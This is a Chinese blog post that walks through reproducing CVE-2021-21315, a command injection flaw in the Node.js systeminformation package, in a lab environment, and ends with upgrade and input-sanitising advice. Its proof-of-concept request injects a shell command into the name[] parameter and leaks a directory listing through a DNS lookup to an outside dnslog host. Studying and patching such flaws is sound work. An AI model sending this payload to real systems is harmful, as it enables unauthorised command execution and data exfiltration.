node.js 命令执行 (CVE-2021-21315)

最新推荐文章于 2024-06-11 10:01:02 发布
最新推荐文章于 2024-06-11 10:01:02 发布
阅读量2k 收藏 3
点赞数
分类专栏: 漏洞 文章标签: node.js 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/122236168
版权

node.js 命令执行 (CVE-2021-21315)

漏洞简介:

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315)攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。

影响版本:


Systeminformation < 5.3.1

环境搭建:

在线环境 地址

漏洞复现:

访问首页

DNSlog申请网址 

 构造poc

/api/getServices?name[]=$(ping%20`ls%20/tmp`.54qzaf.dnslog.cn[自己所申请的地址])

进行访问 ,回显结果

 DNSlog反弹结果

漏洞修复:

目前该漏洞已经修复,将systeminformation及时升级到5.3.1或更高版本。

https://www.npmjs.com/package/systeminformation

如果无法升级,可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数,只允许使用string,拒绝任何数组。

xzhome
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CVE-2021-21315 Linux sudoNode.js命令注入
weixin_47179815的博客
07-15 1541
Node.js是一个基于ChromeV8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。...
CVE-2021-21315 NodeJs命令注入漏洞复现
wurisansheng的博客
10-11 1249
一、简介: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http包含了和http相关的很多函数,帮助开发者对http、tcp、udp等进行操作或创建相关服务器。 二、漏洞描述: Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统
Node.Js命令执行(CVE-2021-21315)
m0_65150886的博客
02-20 429
Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在Systeminformation < 5.3.1的版本中,存在命令执行漏洞,攻击者可以通过未过滤的参数中注入payload执行系统命令。6.尝试发送这样的请求:http://ip:port/api/getServices?
探索Node.js安全边界:CVE-2021-21315-systeminformation深度剖析与应用
最新发布
gitblog_00043的博客
06-11 345
探索Node.js安全边界:CVE-2021-21315-systeminformation深度剖析与应用 项目地址:https://gitcode.com/ForbiddenProgrammer/CVE-2021-21315-PoC 在日益复杂的网络环境中,系统安全成为每个开发者和运维人员关注的焦点。今天,我们将深入探讨一个针对Node.js生态系统中的特定漏洞——CVE-2021-21315,...
node.js 命令执行CVE-2021-21315)复现[VULFOCUS]
m0_37638874的博客
09-06 1942
Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息 npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。里注册申请一个账号,得到一个申请的网址。
CVE-2020-16898: Windows操作系统 TCP-IP远程执行代码漏洞
weixin_38896449的博客
12-03 582
这里写目录标题1.漏洞描述2.影响版本3.漏洞排查4.漏洞利用5.漏洞修复 1.漏洞描述 10月,微软官方发布安全公告,修复了Windows操作系统内的TCP/IP远程代码执行漏洞(CVE-2020-16898)。攻击者可通过发送特制的ICMPv6 Router Advertisement(路由通告)数据包至远程Windows主机,即可在目标主机上执行任意代码。 漏洞风险:严重 2.影响版本 Windows 10 version 1709/1803/1809/1903/1909/2004 Windows S
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为没有很好地解释漏洞(我认为),所以我决定根据系统信息的漏洞版本编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yoursite.co
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台上的一款快速、开放、极简的 Web 开发...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21315v2
05-07
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为它并没有很好地解释漏洞(我认为),所以我决定根据系统信息的易受攻击的版本来编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yours
Node.js-systeminformation-用于获取各种系统信息的Node.JS模块
08-10
包含35种轻量级功能,可以获取详细的硬件,系统和操作系统信息(支持Linux,macOS,部分Windows,FreeBSD和SunOS) - 没有npm依赖。
systeminformation:Node.JS的系统信息库
03-11
系统信息 node.js的系统和操作系统信息库 · · 这真太了不起了。 该项目最初只是一个针对我自己的小项目,现已拥有10,000行以上的代码,发布了400多个版本,每月最多3次mio下载,整体上超过30 mio下载。 感谢所有为这个项目做出贡献的人! 新版本5.0 新版本5在这里-我花了数周的时间来完成这个新版本的定稿。 非常感谢您的支持- 下一个主要版本发布5.0带有新功能,并进行了一些改进和更改(其中一些正在更改)! 添加的音频:获取详细的音频设备信息 添加了蓝牙:获取详细的蓝牙设备信息 添加了dockerImages,dockerVolumes:获取有关docker映像和卷的详细信息 添加的打印机:从检测到的打印机获取信息 添加了USB:获取详细的USB控制器和设备信息 添加了wifi接口ans连接:扩展了wifi信息 更好的uuid功能以获得唯一的硬件和操作系统UUID
Node.Js命令执行漏洞(CVE-2021-21315)复现及排查
dayouzi的博客
08-15 1283
Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令
Node.js命令注入漏洞(CVE-2021-21315)复现
锋刃科技的博客
04-09 2810
简介 Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。 影响版本 Systeminformation < 5.3.1 环境搭建 这里用node10.16.0进行测试 源码下载 git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC.git nodejs开启http...
CVE-2021-21315漏洞复现-kali2020.4
weixin_43867542的博客
07-19 1286
漏洞名称:systeminformation 操作系统命令注入漏洞 等级危害:高危 CVSS评分:7.8 漏洞类型:操作系统命令注入 漏洞概述 systeminformation中存在操作系统命令注入漏洞,该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。 受影响版本 systeminformation < 5.3.1 环境概述 kali2020.4 漏洞复现 1.准备工作 ...
nodejs在cmd中运行js_如何在nodejs里调用执行系统命令
weixin_35785909的博客
12-23 1719
所有的编程语言都有执行系统命令的接口,nodejs也不例外,比如删除调用shell命令,将一个HTML文件转换成PDF文件,如果是PHP,很简单:`prince -v builds/pdf/book.html -o builds/pdf/book.pdf`在PHP里系统命令可以放在反单引号(`)里执行。如果你要是使用nodejs,你需要调用引用var exec = require('child_p...
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修复方法。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值